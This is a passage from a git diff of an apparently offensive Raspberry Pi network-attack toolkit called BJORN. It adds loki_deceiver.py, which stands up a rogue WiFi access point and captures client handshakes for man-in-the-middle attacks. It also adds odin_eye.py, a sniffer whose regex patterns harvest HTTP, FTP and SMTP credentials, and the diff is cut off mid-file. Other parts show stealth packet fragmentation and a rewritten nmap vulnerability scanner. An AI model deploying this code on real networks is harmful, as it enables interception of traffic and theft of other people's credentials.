f = packet.copy()
f[IP].flags = 'MF' if offset + max_size < len(payload) else 0
f[IP].frag = offset // 8
f[IP].payload = Raw(chunk)
frags.append(f)
offset += max_size
return frags
except Exception as e:
logger.debug(f"Fragmentation error: {e}")
return [packet]
def _apply_stealth(self, packet):
"""Randomize TTL and TCP options."""
if IP in packet:
packet[IP].ttl = random.choice([64, 128, 255])
if TCP in packet:
packet[TCP].window = random.choice([8192, 16384, 65535])
# Basic TCP options shuffle
packet[TCP].options = [('MSS', 1460), ('NOP', None), ('SAckOK', '')]
return packet
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface)
mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))
timeout = int(getattr(self.shared_data, "heimdall_guard_timeout", 600))
logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
self.active = True
start_time = time.time()
try:
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
# In a real scenario, this would be hooking into a packet stream
# For this action, we simulate protection state
# Progress reporting
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Guarding... {self.stats['packets_processed']} pkts handled")
# Logic: if we had a queue, we'd process it here
# Simulation for BJORN action demonstration:
time.sleep(2)
logger.info("HeimdallGuard: Protection session finished.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stealth mode disengaged")
except Exception as e:
logger.error(f"HeimdallGuard error: {e}")
return "failed"
finally:
self.active = False
return "success"
if __name__ == "__main__":
from init_shared import shared_data
guard = HeimdallGuard(shared_data)
guard.execute("0.0.0.0", None, {}, "heimdall_guard")

View File

@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone"
b_module = "log_standalone"
b_status = "log_standalone"
b_port = 0 # Indicate this is a standalone action
class LogStandalone:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

View File

@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone2.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone2"
b_module = "log_standalone2"
b_status = "log_standalone2"
b_port = 0 # Indicate this is a standalone action
class LogStandalone2:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

257
actions/loki_deceiver.py Normal file
View File

@@ -0,0 +1,257 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
loki_deceiver.py -- WiFi deception tool for BJORN.
Creates rogue access points and captures authentications/handshakes.
Requires: hostapd, dnsmasq, airmon-ng.
"""
import os
import json
import subprocess
import threading
import time
import re
import datetime
from typing import Any, Dict, List, Optional
from logger import Logger
try:
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
HAS_SCAPY = True
try:
from scapy.all import AsyncSniffer # type: ignore
except Exception:
AsyncSniffer = None
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
EAPOL = None
except ImportError:
HAS_SCAPY = False
scapy = None
Dot11 = Dot11Beacon = Dot11Elt = EAPOL = None
AsyncSniffer = None
logger = Logger(name="loki_deceiver.py")
# -------------------- Action metadata --------------------
b_class = "LokiDeceiver"
b_module = "loki_deceiver"
b_status = "loki_deceiver"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "aggressive"
b_priority = 20
b_cooldown = 0
b_rate_limit = None
b_timeout = 1200
b_max_retries = 1
b_stealth_level = 2 # Very noisy (Rogue AP)
b_risk_level = "high"
b_enabled = 1
b_tags = ["wifi", "ap", "rogue", "mitm"]
b_category = "exploitation"
b_name = "Loki Deceiver"
b_description = "Creates a rogue access point to capture WiFi authentications and perform MITM."
b_author = "Bjorn Team"
b_version = "2.0.2"
b_icon = "LokiDeceiver.png"
b_args = {
"interface": {
"type": "text",
"label": "Wireless Interface",
"default": "wlan0"
},
"ssid": {
"type": "text",
"label": "AP SSID",
"default": "Bjorn_Free_WiFi"
},
"channel": {
"type": "number",
"label": "Channel",
"min": 1,
"max": 14,
"default": 6
},
"password": {
"type": "text",
"label": "WPA2 Password (Optional)",
"default": ""
}
}
class LokiDeceiver:
def __init__(self, shared_data):
self.shared_data = shared_data
self.hostapd_proc = None
self.dnsmasq_proc = None
self.tcpdump_proc = None
self._sniffer = None
self.active_clients = set()
self.stop_event = threading.Event()
self.lock = threading.Lock()
def _setup_monitor_mode(self, iface: str):
logger.info(f"LokiDeceiver: Setting {iface} to monitor mode...")
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'down'], capture_output=True)
subprocess.run(['sudo', 'iw', iface, 'set', 'type', 'monitor'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
def _create_configs(self, iface, ssid, channel, password):
# hostapd.conf
h_conf = [
f'interface={iface}',
'driver=nl80211',
f'ssid={ssid}',
'hw_mode=g',
f'channel={channel}',
'macaddr_acl=0',
'ignore_broadcast_ssid=0'
]
if password:
h_conf.extend([
'auth_algs=1',
'wpa=2',
f'wpa_passphrase={password}',
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
h_path = '/tmp/bjorn_hostapd.conf'
with open(h_path, 'w') as f:
f.write('\n'.join(h_conf))
# dnsmasq.conf
d_conf = [
f'interface={iface}',
'dhcp-range=192.168.1.10,192.168.1.100,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
d_path = '/tmp/bjorn_dnsmasq.conf'
with open(d_path, 'w') as f:
f.write('\n'.join(d_conf))
return h_path, d_path
def _packet_callback(self, packet):
if self.shared_data.orchestrator_should_exit:
return
if packet.haslayer(Dot11):
addr2 = packet.addr2 # Source MAC
if addr2 and addr2 not in self.active_clients:
# Association request or Auth
if packet.type == 0 and packet.subtype in [0, 11]:
with self.lock:
self.active_clients.add(addr2)
logger.success(f"LokiDeceiver: New client detected: {addr2}")
self.shared_data.log_milestone(b_class, "ClientConnected", f"MAC: {addr2}")
if EAPOL and packet.haslayer(EAPOL):
logger.success(f"LokiDeceiver: EAPOL packet captured from {addr2}")
self.shared_data.log_milestone(b_class, "Handshake", f"EAPOL from {addr2}")
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "loki_deceiver_interface", "wlan0")
ssid = getattr(self.shared_data, "loki_deceiver_ssid", "Bjorn_AP")
channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
password = getattr(self.shared_data, "loki_deceiver_password", "")
timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")
logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")
try:
self.stop_event.clear()
# self._setup_monitor_mode(iface) # Optional depending on driver
h_path, d_path = self._create_configs(iface, ssid, channel, password)
# Set IP for interface
subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)
# Start processes
# Use DEVNULL to avoid blocking on unread PIPE buffers.
self.hostapd_proc = subprocess.Popen(
['sudo', 'hostapd', h_path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
self.dnsmasq_proc = subprocess.Popen(
['sudo', 'dnsmasq', '-C', d_path, '-k'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
# Start sniffer (must be stoppable to avoid leaking daemon threads).
if HAS_SCAPY and scapy and AsyncSniffer:
try:
self._sniffer = AsyncSniffer(iface=iface, prn=self._packet_callback, store=False)
self._sniffer.start()
except Exception as sn_e:
logger.warning(f"LokiDeceiver: sniffer start failed: {sn_e}")
self._sniffer = None
start_time = time.time()
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
# Check if procs still alive
if self.hostapd_proc.poll() is not None:
logger.error("LokiDeceiver: hostapd crashed.")
break
# Progress report
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")
time.sleep(2)
logger.info("LokiDeceiver: Stopping AP.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stopping Rogue AP")
except Exception as e:
logger.error(f"LokiDeceiver error: {e}")
return "failed"
finally:
self.stop_event.set()
if self._sniffer is not None:
try:
self._sniffer.stop()
except Exception:
pass
self._sniffer = None
# Cleanup
for p in [self.hostapd_proc, self.dnsmasq_proc]:
if p:
try: p.terminate(); p.wait(timeout=5)
except: pass
# Restore NetworkManager if needed (custom logic based on usage)
# subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
return "success"
if __name__ == "__main__":
from init_shared import shared_data
loki = LokiDeceiver(shared_data)
loki.execute("0.0.0.0", None, {}, "loki_deceiver")

View File

@@ -1,188 +1,460 @@
# nmap_vuln_scanner.py
# This script performs vulnerability scanning using Nmap on specified IP addresses.
# It scans for vulnerabilities on various ports and saves the results and progress.
"""
Vulnerability Scanner Action
Scanne ultra-rapidement CPE (+ CVE via vulners si dispo),
avec fallback "lourd" optionnel.
Affiche une progression en % dans Bjorn.
"""
import os
import pandas as pd
import subprocess
import re
import time
import nmap
import json
import logging
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn
from datetime import datetime, timedelta
from typing import Dict, List, Any
from shared import SharedData
from logger import Logger
logger = Logger(name="nmap_vuln_scanner.py", level=logging.INFO)
logger = Logger(name="NmapVulnScanner.py", level=logging.DEBUG)
b_class = "NmapVulnScanner"
b_module = "nmap_vuln_scanner"
b_status = "vuln_scan"
b_status = "NmapVulnScanner"
b_port = None
b_parent = None
b_action = "normal"
b_service = []
b_trigger = "on_port_change"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 11
b_cooldown = 0
b_enabled = 1
b_rate_limit = None
# Regex compilé une seule fois (gain CPU sur Pi Zero)
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)
class NmapVulnScanner:
"""
This class handles the Nmap vulnerability scanning process.
"""
def __init__(self, shared_data):
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE) avec progression."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.scan_results = []
self.summary_file = self.shared_data.vuln_summary_file
self.create_summary_file()
logger.debug("NmapVulnScanner initialized.")
# Pas de self.nm partagé : on instancie dans chaque méthode de scan
# pour éviter les corruptions d'état entre batches.
logger.info("NmapVulnScanner initialized")
def create_summary_file(self):
"""
Creates a summary file for vulnerabilities if it does not exist.
"""
if not os.path.exists(self.summary_file):
os.makedirs(self.shared_data.vulnerabilities_dir, exist_ok=True)
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.summary_file, index=False)
# ---------------------------- Public API ---------------------------- #
def update_summary_file(self, ip, hostname, mac, port, vulnerabilities):
"""
Updates the summary file with the scan results.
"""
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
# Read existing data
df = pd.read_csv(self.summary_file)
# Create new data entry
new_data = pd.DataFrame([{"IP": ip, "Hostname": hostname, "MAC Address": mac, "Port": port, "Vulnerabilities": vulnerabilities}])
# Append new data
df = pd.concat([df, new_data], ignore_index=True)
# Remove duplicates based on IP and MAC Address, keeping the last occurrence
df.drop_duplicates(subset=["IP", "MAC Address"], keep='last', inplace=True)
# Save the updated data back to the summary file
df.to_csv(self.summary_file, index=False)
except Exception as e:
logger.error(f"Error updating summary file: {e}")
logger.info(f"Starting vulnerability scan for {ip}")
self.shared_data.bjorn_orch_status = "NmapVulnScanner"
self.shared_data.bjorn_progress = "0%"
if self.shared_data.orchestrator_should_exit:
return 'failed'
def scan_vulnerabilities(self, ip, hostname, mac, ports):
combined_result = ""
success = True # Initialize to True, will become False if an error occurs
try:
self.shared_data.bjornstatustext2 = ip
# 1) Metadata
meta = {}
try:
meta = json.loads(row.get('metadata') or '{}')
except Exception:
pass
# Proceed with scanning if ports are not already scanned
logger.info(f"Scanning {ip} on ports {','.join(ports)} for vulnerabilities with aggressivity {self.shared_data.nmap_scan_aggressivity}")
result = subprocess.run(
["nmap", self.shared_data.nmap_scan_aggressivity, "-sV", "--script", "vulners.nse", "-p", ",".join(ports), ip],
capture_output=True, text=True
)
combined_result += result.stdout
# 2) Récupérer MAC et TOUS les ports
mac = row.get("MAC Address") or row.get("mac_address") or ""
vulnerabilities = self.parse_vulnerabilities(result.stdout)
self.update_summary_file(ip, hostname, mac, ",".join(ports), vulnerabilities)
except Exception as e:
logger.error(f"Error scanning {ip}: {e}")
success = False # Mark as failed if an error occurs
ports_str = ""
if mac:
r = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if r and r[0].get('ports'):
ports_str = r[0]['ports']
return combined_result if success else None
if not ports_str:
ports_str = (
row.get("Ports") or row.get("ports") or
meta.get("ports_snapshot") or ""
)
def execute(self, ip, row, status_key):
"""
Executes the vulnerability scan for a given IP and row data.
"""
self.shared_data.bjornorch_status = "NmapVulnScanner"
ports = row["Ports"].split(";")
scan_result = self.scan_vulnerabilities(ip, row["Hostnames"], row["MAC Address"], ports)
if not ports_str:
logger.warning(f"No ports to scan for {ip}")
self.shared_data.bjorn_progress = ""
return 'failed'
if scan_result is not None:
self.scan_results.append((ip, row["Hostnames"], row["MAC Address"]))
self.save_results(row["MAC Address"], ip, scan_result)
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
# Nettoyage des ports (garder juste le numéro si format 80/tcp)
ports = [p.split('/')[0] for p in ports]
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")
# 3) Filtrage "Rescan Only"
if self.shared_data.config.get('vuln_rescan_on_change_only', False):
if self._has_been_scanned(mac):
original_count = len(ports)
ports = self._filter_ports_already_scanned(mac, ports)
logger.debug(f"Filtered {original_count - len(ports)} already-scanned ports")
if not ports:
logger.info(f"No new/changed ports to scan for {ip}")
self.shared_data.bjorn_progress = "100%"
return 'success'
# 4) SCAN AVEC PROGRESSION
if self.shared_data.orchestrator_should_exit:
return 'failed'
logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
findings = self.scan_vulnerabilities(ip, ports)
if self.shared_data.orchestrator_should_exit:
logger.info("Scan interrupted by user")
return 'failed'
# 5) Déduplication en mémoire avant persistance
findings = self._deduplicate_findings(findings)
# 6) Persistance
self.save_vulnerabilities(mac, ip, findings)
# Finalisation UI
self.shared_data.bjorn_progress = "100%"
self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
return 'success'
else:
return 'success' # considering failed as success as we just need to scan vulnerabilities once
# return 'failed'
def parse_vulnerabilities(self, scan_result):
"""
Parses the Nmap scan result to extract vulnerabilities.
"""
vulnerabilities = set()
capture = False
for line in scan_result.splitlines():
if "VULNERABLE" in line or "CVE-" in line or "*EXPLOIT*" in line:
capture = True
if capture:
if line.strip() and not line.startswith('|_'):
vulnerabilities.add(line.strip())
except Exception as e:
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
self.shared_data.bjorn_progress = "Error"
return 'failed'
def _has_been_scanned(self, mac: str) -> bool:
rows = self.shared_data.db.query("""
SELECT 1 FROM action_queue
WHERE mac_address=? AND action_name='NmapVulnScanner'
AND status IN ('success', 'failed')
LIMIT 1
""", (mac,))
return bool(rows)
def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
if not ports:
return []
rows = self.shared_data.db.query("""
SELECT port, last_seen
FROM detected_software
WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
""", (mac,))
seen = {}
for r in rows:
try:
seen[str(r['port'])] = r.get('last_seen')
except Exception:
pass
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
if ttl > 0:
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
final_ports = []
for p in ports:
if p not in seen:
final_ports.append(p)
else:
capture = False
return "; ".join(vulnerabilities)
try:
dt = datetime.fromisoformat(seen[p].replace('Z', ''))
if dt < cutoff:
final_ports.append(p)
except Exception:
pass
return final_ports
else:
return [p for p in ports if p not in seen]
def save_results(self, mac_address, ip, scan_result):
# ---------------------------- Helpers -------------------------------- #
def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
"""Supprime les doublons (même port + vuln_id) pour éviter des inserts inutiles."""
seen: set = set()
deduped = []
for f in findings:
key = (str(f.get('port', '')), str(f.get('vuln_id', '')))
if key not in seen:
seen.add(key)
deduped.append(f)
return deduped
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
cpe = port_info.get('cpe')
if not cpe:
return []
if isinstance(cpe, str):
return [x.strip() for x in cpe.splitlines() if x.strip()]
if isinstance(cpe, (list, tuple, set)):
return [str(x).strip() for x in cpe if str(x).strip()]
return [str(cpe).strip()]
def extract_cves(self, text: str) -> List[str]:
"""Extrait les CVE via regex pré-compilé (pas de recompilation à chaque appel)."""
if not text:
return []
return CVE_RE.findall(str(text))
# ---------------------------- Scanning (Batch Mode) ------------------------------ #
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
"""
Saves the detailed scan results to a file.
Orchestre le scan en lots (batches) pour permettre la mise à jour
de la barre de progression.
"""
all_findings = []
fast = bool(self.shared_data.config.get('vuln_fast', True))
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
# Pause entre batches important sur Pi Zero pour laisser respirer le CPU
batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))
# Taille de lot réduite par défaut (2 sur Pi Zero, configurable)
batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))
target_ports = ports[:max_ports]
total = len(target_ports)
if total == 0:
return []
batches = [target_ports[i:i + batch_size] for i in range(0, total, batch_size)]
processed_count = 0
for batch in batches:
if self.shared_data.orchestrator_should_exit:
break
port_str = ','.join(batch)
# Mise à jour UI avant le scan du lot
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
self.shared_data.comment_params = {
"ip": ip,
"progress": f"{processed_count}/{total} ports",
"current_batch": port_str
}
t0 = time.time()
# Scan du lot (instanciation locale pour éviter la corruption d'état)
if fast:
batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
else:
batch_findings = self._scan_heavy(ip, port_str)
elapsed = time.time() - t0
logger.debug(f"Batch [{port_str}] scanned in {elapsed:.1f}s {len(batch_findings)} finding(s)")
all_findings.extend(batch_findings)
processed_count += len(batch)
# Mise à jour post-lot
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
# Pause CPU entre batches (vital sur Pi Zero)
if batch_pause > 0 and processed_count < total:
time.sleep(batch_pause)
return all_findings
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
vulns: List[Dict] = []
nm = nmap.PortScanner() # Instance locale pas de partage d'état
# --version-light au lieu de --version-all : bien plus rapide sur Pi Zero
# --min-rate/--max-rate : évite de saturer CPU et réseau
args = (
"-sV --version-light -T4 "
"--max-retries 1 --host-timeout 60s --script-timeout 20s "
"--min-rate 50 --max-rate 100"
)
if use_vulners:
args += " --script vulners --script-args mincvss=0.0"
logger.debug(f"[FAST] nmap {ip} -p {port_list}")
try:
sanitized_mac_address = mac_address.replace(":", "")
result_dir = self.shared_data.vulnerabilities_dir
os.makedirs(result_dir, exist_ok=True)
result_file = os.path.join(result_dir, f"{sanitized_mac_address}_{ip}_vuln_scan.txt")
# Open the file in write mode to clear its contents if it exists, then close it
if os.path.exists(result_file):
open(result_file, 'w').close()
# Write the new scan result to the file
with open(result_file, 'w') as file:
file.write(scan_result)
logger.info(f"Results saved to {result_file}")
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Error saving scan results for {ip}: {e}")
logger.error(f"Fast batch scan failed for {ip} [{port_list}]: {e}")
return vulns
if ip not in nm.all_hosts():
return vulns
def save_summary(self):
"""
Saves a summary of all scanned vulnerabilities to a final summary file.
"""
host = nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
# CPE
for cpe in self._extract_cpe_values(port_info):
vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'service-detect',
'details': f"CPE: {cpe}"
})
# CVE via vulners
if use_vulners:
script_out = (port_info.get('script') or {}).get('vulners')
if script_out:
for cve in self.extract_cves(script_out):
vulns.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': 'vulners',
'details': str(script_out)[:200]
})
return vulns
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
vulnerabilities: List[Dict] = []
nm = nmap.PortScanner() # Instance locale
vuln_scripts = [
'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
]
script_arg = ','.join(vuln_scripts)
# --min-rate/--max-rate pour ne pas saturer le Pi
args = (
f"-sV --script={script_arg} -T3 "
"--script-timeout 30s --min-rate 50 --max-rate 100"
)
logger.debug(f"[HEAVY] nmap {ip} -p {port_list}")
try:
final_summary_file = os.path.join(self.shared_data.vulnerabilities_dir, "final_vulnerability_summary.csv")
df = pd.read_csv(self.summary_file)
summary_data = df.groupby(["IP", "Hostname", "MAC Address"])["Vulnerabilities"].apply(lambda x: "; ".join(set("; ".join(x).split("; ")))).reset_index()
summary_data.to_csv(final_summary_file, index=False)
logger.info(f"Summary saved to {final_summary_file}")
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Error saving summary: {e}")
logger.error(f"Heavy batch scan failed for {ip} [{port_list}]: {e}")
return vulnerabilities
if __name__ == "__main__":
shared_data = SharedData()
try:
nmap_vuln_scanner = NmapVulnScanner(shared_data)
logger.info("Starting vulnerability scans...")
if ip not in nm.all_hosts():
return vulnerabilities
# Load the netkbfile and get the IPs to scan
ips_to_scan = shared_data.read_data() # Use your existing method to read the data
host = nm[ip]
discovered_ports_in_batch: set = set()
# Execute the scan on each IP with concurrency
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
console=Console()
) as progress:
task = progress.add_task("Scanning vulnerabilities...", total=len(ips_to_scan))
futures = []
with ThreadPoolExecutor(max_workers=2) as executor: # Adjust the number of workers for RPi Zero
for row in ips_to_scan:
if row["Alive"] == '1': # Check if the host is alive
ip = row["IPs"]
futures.append(executor.submit(nmap_vuln_scanner.execute, ip, row, b_status))
for proto in host.all_protocols():
for port in host[proto].keys():
discovered_ports_in_batch.add(str(port))
port_info = host[proto][port]
service = port_info.get('name', '') or ''
for future in as_completed(futures):
progress.update(task, advance=1)
for script_name, output in (port_info.get('script') or {}).items():
for cve in self.extract_cves(str(output)):
vulnerabilities.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:200]
})
nmap_vuln_scanner.save_summary()
logger.info(f"Total scans performed: {len(nmap_vuln_scanner.scan_results)}")
exit(len(nmap_vuln_scanner.scan_results))
except Exception as e:
logger.error(f"Error: {e}")
# CPE Scan optionnel (sur ce batch)
if bool(self.shared_data.config.get('scan_cpe', False)):
ports_for_cpe = list(discovered_ports_in_batch)
if ports_for_cpe:
vulnerabilities.extend(self.scan_cpe(ip, ports_for_cpe))
return vulnerabilities
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
cpe_vulns = []
nm = nmap.PortScanner() # Instance locale
try:
port_list = ','.join([str(p) for p in ports])
# --version-light à la place de --version-all (bien plus rapide)
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
nm.scan(hosts=ip, ports=port_list, arguments=args)
if ip in nm.all_hosts():
host = nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
for cpe in self._extract_cpe_values(port_info):
cpe_vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'version-scan',
'details': f"CPE: {cpe}"
})
except Exception as e:
logger.error(f"scan_cpe failed for {ip}: {e}")
return cpe_vulns
# ---------------------------- Persistence ---------------------------- #
def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
hostname = None
try:
host_row = self.shared_data.db.query_one(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if host_row and host_row.get('hostnames'):
hostname = host_row['hostnames'].split(';')[0]
except Exception:
pass
findings_by_port: Dict[int, Dict] = {}
for f in findings:
port = int(f.get('port', 0) or 0)
if port not in findings_by_port:
findings_by_port[port] = {'cves': set(), 'cpes': set()}
vid = str(f.get('vuln_id', ''))
vid_upper = vid.upper()
if vid_upper.startswith('CVE-'):
findings_by_port[port]['cves'].add(vid)
elif vid_upper.startswith('CPE:'):
# On stocke sans le préfixe "CPE:"
findings_by_port[port]['cpes'].add(vid[4:])
# 1) CVEs
for port, data in findings_by_port.items():
for cve in data['cves']:
try:
self.shared_data.db.execute("""
INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active, last_seen)
VALUES(?,?,?,?,?,1,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address, vuln_id, port) DO UPDATE SET
is_active=1, last_seen=CURRENT_TIMESTAMP, ip=excluded.ip
""", (mac, ip, hostname, port, cve))
except Exception as e:
logger.error(f"Save CVE err: {e}")
# 2) CPEs
for port, data in findings_by_port.items():
for cpe in data['cpes']:
try:
self.shared_data.db.add_detected_software(
mac_address=mac, cpe=cpe, ip=ip,
hostname=hostname, port=port
)
except Exception as e:
logger.error(f"Save CPE err: {e}")
logger.info(f"Saved vulnerabilities for {ip}: {len(findings)} findings")

247
actions/odin_eye.py Normal file
View File

@@ -0,0 +1,247 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
odin_eye.py -- Network traffic analyzer and credential hunter for BJORN.
Uses pyshark to capture and analyze packets in real-time.
"""
import os
import json
try:
import pyshark
HAS_PYSHARK = True
except ImportError:
pyshark = None
HAS_PYSHARK = False
import re
import threading
import time
import logging
from datetime import datetime
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="odin_eye.py")
# -------------------- Action metadata --------------------
b_class = "OdinEye"
b_module = "odin_eye"
b_status = "odin_eye"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 30
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 4 # Capturing is passive, but pyshark can be resource intensive
b_risk_level = "low"
b_enabled = 1
b_tags = ["sniff", "pcap", "creds", "network"]
b_category = "recon"
b_name = "Odin Eye"
b_description = "Passive network analyzer that hunts for credentials and data patterns."
b_author = "Bjorn Team"
b_version = "2.0.1"
b_icon = "OdinEye.png"
b_args = {
"interface": {
"type": "select",
"label": "Network Interface",
"choices": ["auto", "wlan0", "eth0"],
"default": "auto",
"help": "Interface to listen on."
},
"filter": {
"type": "text",
"label": "BPF Filter",
"default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
},
"max_packets": {
"type": "number",
"label": "Max packets",
"min": 100,
"max": 100000,
"step": 100,
"default": 1000
},
"save_creds": {
"type": "checkbox",
"label": "Save Credentials",
"default": True
}
}
CREDENTIAL_PATTERNS = {
'http': {
'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
'password': [r'password=([^&]+)', r'pass=([^&]+)']
},
'ftp': {
'username': [r'USER\s+(.+)', r'USERNAME\s+(.+)'],
'password': [r'PASS\s+(.+)']
},
'smtp': {
'auth': [r'AUTH\s+PLAIN\s+(.+)', r'AUTH\s+LOGIN\s+(.+)']
}
}
class OdinEye:
def __init__(self, shared_data):
self.shared_data = shared_data
self.capture = None
self.stop_event = threading.Event()
self.statistics = defaultdict(int)
self.credentials: List[Dict[str, Any]] = []
self.lock = threading.Lock()
def process_packet(self, packet):
"""Analyze a single packet for patterns and credentials."""
try:
with self.lock:
self.statistics['total_packets'] += 1
if hasattr(packet, 'highest_layer'):
self.statistics[packet.highest_layer] += 1
if hasattr(packet, 'tcp'):
# HTTP
if hasattr(packet, 'http'):
self._analyze_http(packet)
# FTP
elif hasattr(packet, 'ftp'):
self._analyze_ftp(packet)
# SMTP
